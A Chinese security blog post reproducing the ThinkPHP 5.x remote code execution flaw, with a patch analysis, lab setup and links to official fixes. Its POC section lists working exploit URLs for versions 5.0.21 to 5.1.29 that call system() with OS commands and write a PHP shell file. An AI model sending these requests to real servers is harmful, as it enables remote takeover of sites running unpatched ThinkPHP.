<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>ThinkPHP5多个RCE+文件写入漏洞 | Sp4ce's Blog</title><meta name="description" content="ThinkPHP漏洞 跟着大佬学习下  摘要近日thinkphp团队发布了版本更新https:&#x2F;&#x2F;blog.thinkphp.cn&#x2F;869075 ，其中修复了一处getshell漏洞。 影响范围5.x &lt; 5.1.31&lt;&#x3D; 5.0.23 危害远程代码执行 漏洞分析以下漏洞分析源于斗鱼SRC公众号:斗鱼安全应急响应中心分析补丁：802f284bec821a608e7543d91126ab"><meta name="keywords" content="PHP,VulRepro"><meta name="author" content="Sp4ce"><meta name="copyright" content="Sp4ce"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://0x20h.com/p/576894757.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//pingjs.qq.com"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta property="og:type" content="article"><meta property="og:title" content="ThinkPHP5多个RCE+文件写入漏洞"><meta property="og:url" content="https://0x20h.com/p/576894757.html"><meta property="og:site_name" content="Sp4ce's Blog"><meta property="og:description" content="ThinkPHP漏洞 跟着大佬学习下  摘要近日thinkphp团队发布了版本更新https:&#x2F;&#x2F;blog.thinkphp.cn&#x2F;869075 ，其中修复了一处getshell漏洞。 影响范围5.x &lt; 5.1.31&lt;&#x3D; 5.0.23 危害远程代码执行 漏洞分析以下漏洞分析源于斗鱼SRC公众号:斗鱼安全应急响应中心分析补丁：802f284bec821a608e7543d91126ab"><meta property="og:image" content="https://0x20h.com/img/random/material-9.png"><meta property="article:published_time" content="2018-12-12T03:36:29.000Z"><meta property="article:modified_time" content="2019-04-23T02:10:16.791Z"><meta name="twitter:card" content="summary"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css"><script>var _mtac = {};
(function() {
    var mta = document.createElement("script");
    mta.src = "//pingjs.qq.com/h5/stats.js?v2.0.4";
    mta.setAttribute("name", "MTAH5");
    mta.setAttribute("sid", "66540600");
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(mta, s);
})();
</script><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '4.2.1',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容：${query}"}},
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime: '天',
  date_suffix: {"one_hour":"刚刚","hours":"小时前","day":"天前"},
  copyright: undefined,
  ClickShowText: {"text":"富强,民主,文明,和谐,自由,平等,公正,法治,爱国,敬业,诚信,友善","fontSize":"15px"},
  medium_zoom: false,
  fancybox: true,
  Snackbar: {"bookmark":{"message_prev":"按","message_next":"键将本页加入书签"},"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#2d3035","position":"bottom-center"},
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  isPhotoFigcaption: false,
  islazyload: true,
  isanchor: true
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
    },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2019-04-23 10:10:16'
}</script><noscript><style type="text/css">
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = '1'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><meta name="referrer" content="no-referrer-when-downgrade" /><meta name="generator" content="Hexo 4.2.1"></head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="spinner-box"><div class="configure-border-1"><div class="configure-core"></div></div><div class="configure-border-2"><div class="configure-core"></div></div><div class="loading-word">加载中...</div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" data-lazy-src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">68</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">37</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">23</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-user"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/contact/"><i class="fa-fw fa fa-address-card"></i><span> 联系方式</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#摘要"><span class="toc-number">1.</span> <span class="toc-text">摘要</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#影响范围"><span class="toc-number">2.</span> <span class="toc-text">影响范围</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#危害"><span class="toc-number">3.</span> <span class="toc-text">危害</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#漏洞分析"><span class="toc-number">4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#环境搭建"><span class="toc-number">5.</span> <span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-0"><span class="toc-number">5.1.</span> <span class="toc-text">TP5.0.*</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-1"><span class="toc-number">5.2.</span> <span class="toc-text">TP5.1.*</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#POC"><span class="toc-number">6.</span> <span class="toc-text">POC</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#TP版本5-0-21："><span class="toc-number">6.1.</span> <span class="toc-text">TP版本5.0.21：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP版本5-0-22："><span class="toc-number">6.2.</span> <span class="toc-text">TP版本5.0.22：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TP5-1-1"><span class="toc-number">6.3.</span> <span class="toc-text">TP5.1.*</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#修复方案"><span class="toc-number">7.</span> <span class="toc-text">修复方案</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#官方现已推出补丁-建议开发者进行修复"><span class="toc-number">7.1.</span> <span class="toc-text">官方现已推出补丁 建议开发者进行修复</span></a></li></ol></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(/img/random/material-9.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Sp4ce's Blog</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 文章</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-user"></i><span> 关于我</span></a></div><div class="menus_item"><a class="site-page" href="/contact/"><i class="fa-fw fa fa-address-card"></i><span> 联系方式</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">ThinkPHP5多个RCE+文件写入漏洞</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2018-12-12T03:36:29.000Z" title="发表于 2018-12-12 11:36:29">2018-12-12</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2019-04-23T02:10:16.791Z" title="更新于 2019-04-23 10:10:16">2019-04-23</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/VulRepro/">VulRepro</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">978</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>4分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><p>ThinkPHP漏洞 跟着大佬学习下</p>
<a id="more"></a>
<h1 id="摘要"><a href="#摘要" class="headerlink" title="摘要"></a>摘要</h1><p>近日thinkphp团队发布了版本更新<a href="https://blog.thinkphp.cn/869075" target="_blank" rel="noopener">https://blog.thinkphp.cn/869075</a> ，其中修复了一处getshell漏洞。</p>
<h1 id="影响范围"><a href="#影响范围" class="headerlink" title="影响范围"></a>影响范围</h1><p>5.x &lt; 5.1.31<br>&lt;= 5.0.23</p>
<h1 id="危害"><a href="#危害" class="headerlink" title="危害"></a>危害</h1><p>远程代码执行</p>
<h1 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h1><p><strong>以下漏洞分析源于斗鱼SRC公众号:斗鱼安全应急响应中心</strong><br>分析补丁：<code>802f284bec821a608e7543d91126abc5901b2815</code><br>路由信息中<code>controller</code>的部分进行了过滤，可知问题出现在路由调度时。<br><img src= "/img/loading.gif" data-lazy-src="/images/cuFsz4H.png" alt=""><br>以5.1.23版本进行分析，执行路由调度的代码如下：<br><img src= "/img/loading.gif" data-lazy-src="/images/DM8TEz9.png" alt=""><br>其中使用了<code>$this-&gt;app-&gt;controller</code>方法来实例化控制器，然后调用实例中的方法。跟进<code>controller</code>方法：<br><img src= "/img/loading.gif" data-lazy-src="/images/Pf9P9Zm.png" alt=""><br>其中通过parseModuleAndClass方法解析出<code>$module</code>和<code>$class</code>，然后实例化<code>$class</code>。<br><code>rseModuleAndClass</code>方法中，当<code>$name</code>以反斜线\开始时直接将其作为类名。利用命名空间的特点，如果可以控制此处的<code>$name</code>（即路由中的controller部分），那么就可以实例化任何一个类。<br>接着，我们再往回看路由解析的代码。其中<code>route/dispatch/Url.php:: parseUrl</code>方法调用了<code>route/Rule.php:: parseUrlPath</code>来解析<code>pathinfo</code>中的路由信息<br><img src= "/img/loading.gif" data-lazy-src="/images/PwlJiDz.png" alt=""><br>代码比较简单，就是使用/对<code>$url</code>进行分割，未进行任何过滤。<br>其中的路由url从<code>Request::path()</code>中获取<br><img src= "/img/loading.gif" data-lazy-src="/images/Bj5ShWd.png" alt=""><br>由于<code>var_pathinfo</code>的默认配置为<code>s</code>，我们可利用<code>$_GET[&#39;s&#39;]</code>来传递路由信息，也可利用<code>pathinfo</code>来传递，但测试时<code>windows</code>环境下会将<code>$_SERVER[&#39;pathinfo&#39;]</code>中的<code>\</code>替换为<code>/</code>。<br>结合前面分析可得初步利用代码如下：<code>index.php?s=index/\namespace\class/method</code>，这将会实例化<code>\namespace\class</code>类并执行<code>method</code>方法。<br>然而利用过程中会存在一些限制，部分类在实例化时由于缺少参数而报错。<br>经过一番寻找，在<code>\think\Request</code>类中找到可以利用的方法<code>input</code>。以下为执行<code>phpinfo</code><br><img src= "/img/loading.gif" data-lazy-src="/images/qoEVsRB.png" alt=""></p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><h2 id="TP5-0"><a href="#TP5-0" class="headerlink" title="TP5.0.*"></a>TP5.0.*</h2><p>直接从官网下载完整包解压到www（网站根目录）目录即可，URL指向public目录（如：<a href="http://localhost/TP5.0.22/public/" target="_blank" rel="noopener">http://localhost/TP5.0.22/public/</a> ）</p>
<h2 id="TP5-1"><a href="#TP5-1" class="headerlink" title="TP5.1.*"></a>TP5.1.*</h2><p>官方不再提供完整版下载，笔者从<code>composer</code>下载最新版后与官方GitHub进行了对比，发现以下几个仓库<br><a href="https://github.com/top-think/framework" target="_blank" rel="noopener">Framework</a><br><a href="https://github.com/top-think/think" target="_blank" rel="noopener">think</a><br><a href="https://github.com/top-think/think-installer" target="_blank" rel="noopener">think-installer</a><br>发现<code>framework</code>仓库就是完整版中的<code>thinkphp</code>目录<br><img src= "/img/loading.gif" data-lazy-src="/images/WU29xTj.png" alt=""><br><img src= "/img/loading.gif" data-lazy-src="/images/Nb1OTBQ.png" alt=""><br><code>think</code>仓库是<code>thinkphp</code>的主架构<br><code>think-installer</code>对应路径为<code>path\to\thinkphp\vendor\topthink\think-installer</code><br>那么整合下就好了<br>最终目录架构<br><img src= "/img/loading.gif" data-lazy-src="/images/yneSfIP.png" alt=""><br>访问下<br><img src= "/img/loading.gif" data-lazy-src="/images/cRuL2lH.png" alt=""></p>
<h1 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h1><h2 id="TP版本5-0-21："><a href="#TP版本5-0-21：" class="headerlink" title="TP版本5.0.21："></a>TP版本5.0.21：</h2><p><code>http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=id</code><br><img src= "/img/loading.gif" data-lazy-src="/images/XUjPpxb.png" alt=""></p>
<p><code>http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1</code><br><img src= "/img/loading.gif" data-lazy-src="/images/KeDQzUm.png" alt=""></p>
<h2 id="TP版本5-0-22："><a href="#TP版本5-0-22：" class="headerlink" title="TP版本5.0.22："></a>TP版本5.0.22：</h2><p><code>http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=id</code><br><img src= "/img/loading.gif" data-lazy-src="/images/7SrIz6U.png" alt=""></p>
<p><code>http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1</code><br><img src= "/img/loading.gif" data-lazy-src="/images/YMN2l7m.png" alt=""></p>
<h2 id="TP5-1-1"><a href="#TP5-1-1" class="headerlink" title="TP5.1.*"></a>TP5.1.*</h2><p><strong>thinkphp5.1.29为例</strong></p>
<p><strong>1、代码执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&amp;filter=phpinfo&amp;data=1</code><br><img src= "/img/loading.gif" data-lazy-src="/images/vdPHFZd.png" alt=""></p>
<p><strong>2、命令执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&amp;filter=system&amp;data=操作系统命令</code><br><img src= "/img/loading.gif" data-lazy-src="/images/F5VWU1A.png" alt=""></p>
<p><strong>3、文件写入（写shell）：</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&amp;cacheFile=shell.php&amp;content=%3C?php%20phpinfo();?%3E</code><br><img src= "/img/loading.gif" data-lazy-src="/images/63d5t6k.png" alt=""></p>
<p><strong>4、未知:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&amp;content=%3C?php%20phpinfo();?%3E</code></p>
<p><strong>5、代码执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1</code><br><img src= "/img/loading.gif" data-lazy-src="/images/fmXDhBm.png" alt=""></p>
<p><strong>6、命令执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=操作系统命令</code><br><img src= "/img/loading.gif" data-lazy-src="/images/71eijSN.png" alt=""></p>
<p><strong>7、代码执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[0]=phpinfo&amp;vars[1][]=1</code><br><img src= "/img/loading.gif" data-lazy-src="/images/AOPpttb.png" alt=""></p>
<p><strong>8、命令执行:</strong><br><code>http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=操作系统命令</code><br><img src= "/img/loading.gif" data-lazy-src="/images/UM5djyf.png" alt=""></p>
<h1 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h1><h2 id="官方现已推出补丁-建议开发者进行修复"><a href="#官方现已推出补丁-建议开发者进行修复" class="headerlink" title="官方现已推出补丁 建议开发者进行修复"></a>官方现已推出补丁 建议开发者进行修复</h2><p>Thinkphp v5.0.x补丁地址: <a href="https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f" target="_blank" rel="noopener">https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f</a></p>
<p>Thinkphp v5.1.x补丁地址: <a href="https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815" target="_blank" rel="noopener">https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815</a></p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Sp4ce</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://0x20h.com/p/576894757.html">https://0x20h.com/p/576894757.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://0x20h.com" target="_blank">Sp4ce's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PHP/">PHP</a><a class="post-meta__tags" href="/tags/VulRepro/">VulRepro</a></div><div class="post_share"><div class="social-share" data-image="/img/random/material-9.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/p/2397076861.html"><img class="prev-cover" data-lazy-src="/img/random/material-8.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">自动清理NGINX日志脚本</div></div></a></div><div class="next-post pull-right"><a href="/p/1473644914.html"><img class="next-cover" data-lazy-src="/img/random/material-8.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">Sublime Text 3搭建PHP Debug环境</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span> 相关推荐</span></div><div class="relatedPosts-list"><div><a href="/p/2364522992.html" title="一个CTF题"><img class="cover" data-lazy-src="/img/random/material-18.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2019-01-20</div><div class="title">一个CTF题</div></div></a></div><div><a href="/p/332015673.html" title="LAMP服务器报错500调试方法"><img class="cover" data-lazy-src="/img/random/material-7.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2018-06-08</div><div class="title">LAMP服务器报错500调试方法</div></div></a></div><div><a href="/p/2642571319.html" title="建站之星v2.7SQL注入"><img class="cover" data-lazy-src="/img/random/material-12.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2018-11-24</div><div class="title">建站之星v2.7SQL注入</div></div></a></div><div><a href="/p/7506.html" title="ThinkCMF缓存getshell"><img class="cover" data-lazy-src="/img/random/material-11.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2020-01-10</div><div class="title">ThinkCMF缓存getshell</div></div></a></div><div><a href="/p/4110562338.html" title="XSS平台原理浅析"><img class="cover" data-lazy-src="/img/random/material-7.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2018-06-20</div><div class="title">XSS平台原理浅析</div></div></a></div><div><a href="/p/3494507906.html" title="PHP中检查会话是否过期"><img class="cover" data-lazy-src="/img/random/material-18.png"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2018-08-25</div><div class="title">PHP中检查会话是否过期</div></div></a></div></div></div><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></article></main><footer id="footer" style="background-image: url(/img/random/material-9.png)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2016 - 2020 By Sp4ce</div><div class="framework-info"><span>框架 </span><a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fas fa-times"></i></span></div><div id="search-mask"></div><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module" defer></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload/dist/lazyload.iife.min.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><script>function panguFn () {
  if (typeof pangu === 'object') pangu.spacingElementById('content-inner')
  else {
    $.getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js', () => {
      pangu.spacingElementById('content-inner')
    })
  }
}

function panguInit () {
  if (false){
    GLOBAL_CONFIG_SITE.isPost && panguFn()
  } else {
    panguFn()
  }
}

document.addEventListener('DOMContentLoaded', panguFn)</script><script src="/js/search/local-search.js"></script><script>var endLoading = function () {
  document.body.style.overflow = 'auto';
  document.getElementById('loading-box').classList.add("loaded")
}
window.addEventListener('load',endLoading)</script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    window.valine = new Valine({
      el: '#vcomment',
      appId: 'pFyFD9ztxm24V3fTYbcslwPv-MdYXbMMI',
      appKey: 'sW9q4Ntrbowadsh5sHB8V31r',
      placeholder: '说点什么吧',
      avatar: 'mm',
      meta: 'nick,mail,link'.split(','),
      pageSize: '10',
      lang: 'zh-CN',
      recordIP: true,
      serverURLs: '',
      emojiCDN: '',
      emojiMaps: "",
      enableQQ: true,
      path: window.location.pathname,
    });
    if ('nick,mail') { valine.config.requiredFields= 'nick,mail'.split(',') }
  }

  if (typeof Valine === 'function') initValine() 
  else $.getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js', initValine)
}

if ('Valine' === 'Valine' || !true) {
  if (true) btf.loadComment(document.querySelector('#vcomment'),loadValine)
  else setTimeout(() => loadValine(), 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script defer="defer" id="ribbon_piao" mobile="false" src="/js/third-party/piao.js"></script><script src="/js/third-party/activate-power-mode.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
document.body.addEventListener('input', POWERMODE);
